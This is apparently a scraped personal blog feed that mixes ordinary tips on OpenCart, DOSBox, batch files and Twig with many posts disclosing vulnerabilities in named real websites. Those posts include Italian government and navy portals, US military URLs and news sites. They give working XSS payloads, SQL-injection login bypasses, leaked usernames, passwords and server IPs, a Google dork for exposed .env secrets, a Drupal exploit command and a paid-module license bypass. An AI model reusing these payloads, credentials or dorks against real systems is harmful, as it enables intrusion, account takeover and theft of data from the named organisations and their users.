pro(re)gress

$('#form-upload input[name=\'file\']').val().replace(/\\/g, '/').split('/').pop()

Run in SQL (ex. via phpmyadmin) after selecting your opencart database. TRUNCATE `oc_affiliate`; TRUNCATE `oc_affiliate_activity`; TRUNCATE `oc_affiliate_login`; TRUNCATE `oc_affiliate_transaction`;

IMPORTANT NOTE: editSetting() will Delete ALL the previous settings. Usually in opercart it's used in the configuration page to get all the data in one "post" request. This sample is for the module 'accountdisabler' - replace 'accountdisabler' with your own module name. Also the key string (ex. 'accountautodisabler_days' ) must start with your module name. //Loading the model $this->load->model('setting/setting'); //setting data for our module $aadata = array('accountautodisabler_days' => '60'); //editing $this->model_setting_setting->editSetting('accountautodisabler', $aadata); In this example it saves data for the main/first store ( with id 0 ).  An example to store multiple multiple values that are serialized in the database //Loading the model $this->load->model('setting/setting'); //setting data for our module $aadata = array('accountautodisabler_days' =>

http://www.innova-srl.it/clientiReg.asp?reg=[sqli] (using a wildcard % ) http://www.innova-srl.it/clientiReg.asp?reg=%25 archived: http://archive.is/U5CsM

Dosbox slow on several games. I just solved by adding the following in dosbox.conf cycles=fixed 15000

xss http://www.ichada.xyz/index.php?app=doc&lang=fr%22%3E%3Cscript%3Ealert(1);%3C/script%3E http://archive.is/G7miq

Driver EDIROL SD20 USB Studio Canvas MIDI 64 Voci GM2/GS/XG Driver windows 98/ME - Seriale Driver windows 98/ME - USB Driver windows XP e 2000 - Seriale Driver windows XP e 2000 - USB Ripped directly from the original CD.

user: Sql786473 mysql server 62.149.143.196

XSS https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><" archived: http://archive.is/P0OXI SQL Injection sample raising an error https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00 archived: http://archive.is/ufpwM  Error Executing Database Query. You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3 The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84 Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1 Called from /var/www/html/gmashop/Inside.cfm: line 48 Called from /var/www/html/gmashop/Query/Prodotti/SelNo

http://www.eknam.com | xss, sql injection /web/htdocs/www.eknam.com/home/default_files/meta_tag_query.php /web/htdocs/www.eknam.com/home/default_files/contenuto_footer.php XSS xss can be injected in almost all the parameters. example http://www.eknam.com/blocchi_liv3.php?lingua=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22it&pagina=torte.php&class= archived: http://archive.is/5X39s

Protocol: SMTP Parameters: (empty) Server: tls://smtp.gmail.com username: [youremail]@gmail.com password: [yourpassword] SMTP Port: 587

In the last days someone have already exposed sensitive informations about M5S. I don't have/own/store/view those sensitive informations! After the "supposed" security breach M5S told to newspapers and their users that all the security problems have been "fixed"and that they are investing a lot of moneys in "security" with professional companies. I don't know what they are doing but, if true, they are mostly wasting their own moneys or those from their donors. Note that they already got an email message, time ago, and they didn't fix those problems specified in the message and available in a previous post. --- Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it. Check the previous post and the CVEs! --- They added an XSS protection but they haven't fixed them (XSS) in the scripts. It's possible to create "phisihing" pages (this is an example/joke). NOTE : what

SQL Injection https://fromrussiawithtroll.com/index.php?which_graph=[sqli] https://fromrussiawithtroll.com/index.php?query=&language=&country=not_set&page=[sqli] XSS https://fromrussiawithtroll.com/index.php?language=not_set&country=not_set&query=%3Cscript%3Ealert(%22troll%22)%3B%3C%2Fscript%3E

Malicious urls can be generated to redirectusers after login (phishing) https://supportopersonale.marina.difesa.it/login/?redirect_to=https://[phishing_site_obfuscated] Usernames can be detected by bruteforcing the password reset. There's no limit. https://supportopersonale.marina.difesa.it/password-reset/ example of working usernames: aldo giovanni giacomo Passwords can be changed with a specific bug adding in the string a second email as recipient. Various users have the password equal to the username.  In the user area it's possible to do stored XSS (tested) and possibly take over other accounts (not tested). - The email addresses can be used via https://mail.marina.difesa.it and in various cases passwords are the same as those used in supportopersonale.marina.difesa.it ______________ ______________ Another website where is possible to to bruteforce users (not as the previous one) https://vrmtc.marina.difesa.it/Portal/mail_password admin

The website is https://gps123.org/ the old website http://trackanywhere.com/ doesn't work.

opencart multilingual seo toolkit unlock - on localhost Add at the end of \admin\view\javascript\multilingual_seo_toolkit\multilingual_seo_toolkit.min.js the following code $( document ).ajaxComplete(function() {     $('#Activation').hide();     $('#MultilingualSeoToolkit').show(); }); I just did it to use the  in localhost and there was no way to use a legit version for a customer. It's a workaround that shows the module's panel. I'm not promoting pirated stuff!!

almost all  the pages have bad backlinsk with "cialis" related keywords. ("Cialis price canada") http://archive.is/cD6m8 ("Buy cialis london") http://archive.is/8aJf0 ... etc. Note: I have no relations with the malware or anything that happened on that site.

How to easily escape characters for variables in batch files To escape the following special characters ^ & | < > ( ) # from the command line we just need to add a single ^ Example:  When we are setting a variable we must use ^^^ instead of the single ^ SET myvariable= ^^^# mytext ^^^ &mytext ^^^ <

Path: /home/wordddze/ Mysql user: wordddze password: Some errors ____________ Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 656 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/index.php on line 656 Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 657 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/index.php on line 657 Warning: mysql_real_escape_string(): Access denied for user 'wordddze'@'localhost' (using password: NO) in /home/wordddze/public_html/index.php on line 658 Warning: mysql_real_escape_string(): A link to the server could not be established in /home/wordddze/public_html/inde

Install WinPython  (I installed WinPython-64bit-3.6.0.1Qt5) run WinPython Powershell Prompt.exe To check if you have the latest pip run: pip install --upgrade pip To install tensorflow run: pip install --upgrade tensorflow To install virtualenv (optional - virtual environment) run: pip install --upgrade virtualenv

anyconnect minarelli https://37.182.223.98/+CSCOE+/logon.html?a0=15&a1=&a2=&a3=1#form_title_text

wordpress 3.5 sql injection

possible config files res/config.php res/access.inc.php example http://www.ravennaballetstudio.it/res/access.inc.php array( 'groups' => array('xa0n99c9'), 'id' => 'h2d0n68h', 'name' => 'admin', 'password' => 'rbs', 'page' => 'email.html' ), 'cliente' => array( 'groups' => array('h2d0n68h'), 'id' => '9y754byl', 'name' => 'cliente', 'password' => 'rbs', 'page' => 'area-protetta.php' ) ); // Admins list $imSettings['access']['admins'] = array('h2d0n68h'); // Page/Users permissions $imSettings['access']['pages'] = array( '32' => array('9y754byl')); // End of file access.inc.php

this is just an error with informations. Do not ask for the SQLi! http://www.president.gov.af/sroot_eng.aspx?id=75 Note: Fixed (?) on 08/05/2018 sample error -------- [FormatException: Input string was not in a correct format.] System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7467367 System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119 System.String.System.IConvertible.ToInt32(IFormatProvider provider) +46 System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider) +373 System.Data.SqlClient.SqlParameter.CoerceValue(Object value, MetaType destinationType) +4870818 [FormatException: Failed to convert parameter value from a String to a Int32.] System.Data.SqlClient.SqlParameter.CoerceValue(Object value, MetaType destinationType) +4870015 System.Data.SqlClient.SqlParameter.GetCoercedValue() +32 System.Da

Download (vecchio) Manuale operativo Poste Italiane. Apparecchiature e software non dovrebbero essere più in uso e non ci dovrebbero essere problemi nel far scaricare questo manuale che è stato scansionato prima di essere buttato definitivamente. Elsag Bailey SISTEMA AUTOMAZIONE SERVIZI ACCESSORI GUIDA ALL'ESERCIZIO OPERATIVO UFFICIO DI AVVIAMENTO/DISTRIBUZIONE Apparecchiature commerciali usate M24-XD OLIVETTI NETSTRADA 1000 OLIVETTI WS 785 OLIVETTI WS 510 OLIVETTI Microbar Barcode International AROS Sentinel 3 Green 75 DIGICOM Modem Fax 33.6 v.34+ LEXMARK 2390

Wordpress 4.8 sql injections Getting the local path raising an error: https://www.campanianewsteel.it/wp-includes/class-wp-customize-panel.php archived: http://archive.is/mrSkq path: /home/campnewste/campanianewsteel.it/htdocs/

https://portal.africom.smil.mil/orgs/oplog/at/default.aspx http://maps.eucom.smil.mil/ATFP/index.cfm http://jramp.smil.mil/

https://blog.st.com andrewroberts colinlong daniele michaelmarkowitz gerardcronin olm_writer pamelamccracken stblogadmin .. bugged plugin onesignal-free-web-push-notifications https://blog.st.com/wp-content/plugins/onesignal-free-web-push-notifications/ https://blog.st.com/wp-content/plugins/onesignal-free-web-push-notifications/readme.txt archived page: http://archive.is/1IY0F __________ https://smarter.st.com stadmin

Some informations leaked from warnings and it was easy to better understand  how to inject code. Warning: Declaration of AtElementCreator::create_element($doc) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0 Warning: Declaration of DotElementCreator::create_element($doc) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0 Warning: Declaration of LinkElementCreator::create_element($doc, $content) should be compatible with ElementCreator::create_element($doc, $content = NULL) in /DISK2/WWW/devpaks.org/www/epf/helpers.php on line 0

lilis.it malware http://www.lilis.it/telefono-de-viagra-spain-110716/ http://archive.is/UUBjz

joomla with malware http://www.provincia.benevento.it/jaextmanager_data/j16/template/ja_teline_iv/cache/acquistare-priligy-generico.html Archived:http://archive.is/WFqNv

vulnerable wordpress and bugged divi theme /home/agos28/public_html/avvocatoiannotta.it/

XSS in the login user http://www.brace.sinanet.apat.it/winair/winair_custom.avvio XSS http://www.brace.sinanet.apat.it/web/struttura.html?p_livello_1=2&p_main=web/centro.moni%22%3E%3Cscript%3Ealert(123);%3C/script%3E%3Cnone%20src=%22 http://193.206.192.215 In the errors we can see Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server Server at 193.206.192.215 Port 7778

simple XSS (via GET or POST) http://www.confindustria.benevento.it/moduli/ricerca/ricerca.php?campo=%3Cscript%3Ealert(document.cookie);%3C/script%3E archived (javascript that shows the cookie): http://archive.is/8WN7B Fatal error: Uncaught exception 'Zend_Db_Adapter_Exception' with message 'SQLSTATE[08004] [1040] Too many connections' in /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Abstract.php:138 Stack trace: #0 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Pdo/Mysql.php(96): Zend_Db_Adapter_Pdo_Abstract->_connect() #1 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(828): Zend_Db_Adapter_Pdo_Mysql->_connect() #2 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Adapter/Abstract.php(898): Zend_Db_Adapter_Abstract->quote('TITOLO_ITALIANO', NULL) #3 /usr/local/ZendFramework-1.8.5-minimal/library/Zend/Db/Select.php(930): Zend_Db_Adapter_Abstract->quoteInto('variabile=?&#

getting the path from Wordpress errors /web/htdocs/www.mugaict.com http://archive.is/8OZFR

wordpress 4.3.1 archived readme: http://archive.is/EKXWM script redirecting anything that is base64 encoded www.smsengineering.it/Sendblaster_mtSMS.php?hop=OJQ022F9DY/r/aW5mb0BzdHVkaW90ZXNvbmUuY29t/l/aHR0cDovL3d3dy5hdGNvcm9nbGlvLml0Lw

wordpress 3.8 path: D:\inetpub\webs\futurideanet\

Simple XSS in the search form http://www.liverini.it/cerca.php "><script>alert([XSS]);</script><" http://www.liverini.it/archivio.php?codice=[SQL Inj] sample archived error: http://archive.is/33opk path: /var/www/vhosts/liverini.it/httpdocs/ Zend Framework

With a bit of efforts with stuff that I'm not used to I solved the "puzzle" and it's possible to use bugs and misconfigurations to have, also thanks to public informations (not a bad thing), access to the local network. /afs/lnf.infn.it/project/server/ archived error:http://archive.is/DRuA8 The error is related to this open source event management system https://github.com/indico/indico They are using shibboleth sso (single signon) federated identity management Publicly available Information: Info server http://www.lnf.infn.it/Calcolo/afs/ lxgw.lnf.infn.it (open via ssh to all users) lxplus.lnf.infn.it (open via ssh only from LNF lan) - info from mit.edu https://lost-contact.mit.edu/afs/lnf.infn.it/ http://archive.is/hshNP Old informations from afs7.lnf.infn.it, afs1.lnf.infn.it, afs2.lnf.infn.it, afs3.lnf.infn.it - Info servers ( old - the servers are 10+ ): http://calcolo.lnf.infn.it/index.php?option=com_content&view=article&a

cisco 80.21.172.1 vulnerable and we can have access to the local network. On one of their computer/server they have the source code of their apps that are practically ... *malwares*.

Wordpress 4.7.1.0 - exploitable with content injection. To raise an error and get the path we go to the dear hello dolly. http://www.iswatlab.eu/wp-content/plugins/hello.php archived: http://archive.is/K3JUf Fatal error: Call to undefined function add_action() in /web/htdocs/www.iswatlab.eu/home/wp-content/plugins/hello.php on line 60

A fast way to rename folders (or files - with a small modification) to lowercase. $usrfilespath = 'yourfolder/';         if(is_dir($usrfilespath)) {             $files = scandir($usrfilespath);             foreach($files as $key=>$name){                 if($name !== '.' && $name !== '..' &&  is_dir($usrfilespath . '/' . $name)){                 rename( $usrfilespath . '/' . $name, $usrfilespath . '/' . strtoupper($name) );                 echo ( $usrfilespath . '/' . $name . '<br>' . $usrfilespath . '/' . strtolower($name) . '<br><br>' );                 }             }                         $ToOutput .= 'OK: Folders renamed to lowercase<br>';                 } else {             $ToOutput .= 'ERROR: No folders to rename<br>';         } echo $ToOutput

http://www.slowmyfood.com Server iis path from the errors: D:\inetpub\webs\slowmyfoodcom\ software Shopfactory there's a robots.txt in a subfolder http://www.slowmyfood.com/pub/robots.txt # robots.txt for http://ou-8918-jg.shopfactory.com/ User-agent: * Allow: * Disallow: */contents/pconfirm.html Disallow: */contents/progress.html Disallow: */contents/provider.html Disallow: */contents/reseller.html Disallow: */contents/ups.html Disallow: */contents/basket.php Disallow: */contents/*/changecurrency.html Disallow: */contents/*/customerdtl.html Disallow: */contents/*/login.html Disallow: */contents/*/orderterms.html Disallow: */contents/*/ordertotal.html Disallow: */contents/*/search.html Disallow: */contents/*/search_result.html Disallow: */contents/*/shipping_charge.html Disallow: */contents/*/thankyou.html Disallow: */contents/*/unsuccessful.html Disallow: */contents/*/V6*.html Disallow: */contents/*/website.html Sitemap: http://ou-8918-jg.shopfactory.com/sitemap.xml 

http://lascalaw.com/persone/?iniziale=U%3Cscript%3Ealert(1);%3C/script%3E archived (code): http://archive.is/lgyGo

edit the common.js and make sure to use a copy in your custom theme. header.tpl change from: <script src="catalog/view/javascript/common.js" type="text/javascript"></script> to: <script src="catalog/view/theme/[yourtheme]/javascript/common.js" type="text/javascript"></script> in catalog/view/theme/[yourtheme]/javascript/ common.js comment ( // ) all the occurences of the following line  //$('html, body').animate({ scrollTop: 0 }, 'slow'); in the css do the following: /*add to the theme - stylesheet.css this part*/ .alert{     position:fixed;     width: 100%;     top:0;     left:0;     z-index:10000; }

The website is linked from http://www.cstsannio.it/ (AVCP in the menu) and have several security problems related to various misconfigurations. http://servizi5.cstsannio.it:8080/xampp/ archived: http://archive.is/SesIG http://servizi5.cstsannio.it:8080/xampp/phpinfo.php archived: http://archive.is/qvOhW http://servizi5.cstsannio.it:8080/xampp/security.php archived: http://archive.is/hy33G the default password for daemon is still xampp For mysql the password of root is empty (mysqld is not running).

 http://www.odg.it Old version of Drupal with several security problems. It's possible to have admin access and upload a php shell. (2019-05 the problem is still there)  https://sigef-odg.lansystems.it Access as any user via sql injection. sample injection user: ' or ''=' password: ' or ''=' (2019-05 - they tried to fix the problem the previous injection doesn't work) New injection ' or ''=''-- sample screenshot Sample error  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and `password`=SHA2('',256) AND IFNULL(UFPC.eliminato,0) NOT IN (1,8,9)' at line 1 NOTE: I have not saved/stored any kind of confidential information and I have no criminal intents of any kind. 1958 --- 2018-04 - odg.it has been notified (2 times) of the problems via email . No reply received.

http://www.trottabenevento.it/login.php a' or ''=' a' or ''=' Array ( [0] => 42S02 [1] => 1146 [2] => Table 'Sql1064148_1.log' doesn't exist ) First error Array ( [0] => 42000 [1] => 1064 [2] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a', Ip = '95.238.158.239', Note='prova con email/password errata', Pagina='/veri' at line 1 ) 

Converting the template from tpl to twig is somewhat easy to do. Download "php2twig" slightly modified (click here), on the fly, to have a working recursive file conversion (recursive glob function from php.net comments). The original source code can be found here: https://github.com/makinacorpus/php-twig-converter Copy php2twig in your theme folder (suggested). Go in your theme folder and run the following command: (windows) php.exe php2twig -e .tpl -ne .twig -r "c:/fullpath/to/template" (linux) ./php2twig -e .tpl -ne .twig -r /fullpath/to/template Save the output of php2twig to verify eventual problems. For sure the bulk work is mostly done by this useful script Note: the script doesn't convert correctly the {% endfor %}.

Windows and Mac os Just go to your installation folder ex.: c:\Program Files\TechSmith\Camtasia 9\ and rename the folder of the current language into anything else or force the folder to be non usable/writeable. For example, with german: c:\Program Files\TechSmith\Camtasia 9\de-DE The best solution is to download the trial from the official website that is in English language and when you can choose the language while installing

How to get the Zend Framework (1) version from a standalone file. create your index.php and echo the 'VERSION' const or just open Zend/Version.php for Zend 1 <?php    require_once 'Zend/Version.php';    echo Zend_Version::VERSION; ?> for Zend 2 <?php    require_once 'Zend/Version/Version.php';    echo Zend\Version\Version::VERSION; ?>

with WordPress version 4.0.13 http://securityaffairs.co/wordpress/wp-content/debug.log was full of debug informations. I didn't save it. WP_query SQL Injection Update: site fixed and updated

htaccess mod_rewrite - how to send everything to the default 404. If mod_rewrite is not working we just deny. I'm open to suggestions (ex. using only the "Redirect" directive). <IfModule mod_rewrite.c> RewriteRule   .* - [R=404,L] </IfModule> <IfModule !mod_rewrite.c> order deny,allow deny from all </IfModule>

Google Dork: "DB_PASSWORD" filetype:env samples www.nicn.gov.ng/funds/.env ... DB_USERNAME=sanfas93_funds ...   Cache http://webcache.googleusercontent.com/search?q=cache:MpIEuXgh8g0J:www.nicn.gov.ng/funds/.env+&cd=1&hl=it&ct=clnk&gl=it http://archive.is/QAPCN http://webcache.googleusercontent.com/search?q=cache:CTsy_8EgUX0J:www.snapnet.com.ng/support/.env+&cd=2&hl=it&ct=clnk&gl=it http://archive.is/eSLW6 http://lightscameraafrica.com/shared/.env http://archive.is/nzYvl http://www.energycom.gov.gh/cewp/.env http://archive.is/DNAlm http://www.ltleadership.org/test/.env http://archive.is/tOa6p

http://www.salvinipremier.it/ C:\sitix\salvinipremier\*

 Drupal sql injection and account creation python 34992 -t http://www.ilgiornale.it/ -u dop -p dop We can  raise an error to have more info Drupal PDOException : SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><&q

http://www.lamicitra.com/ /home/teguh/public_html/ System is also already compromised by defacers/crackers.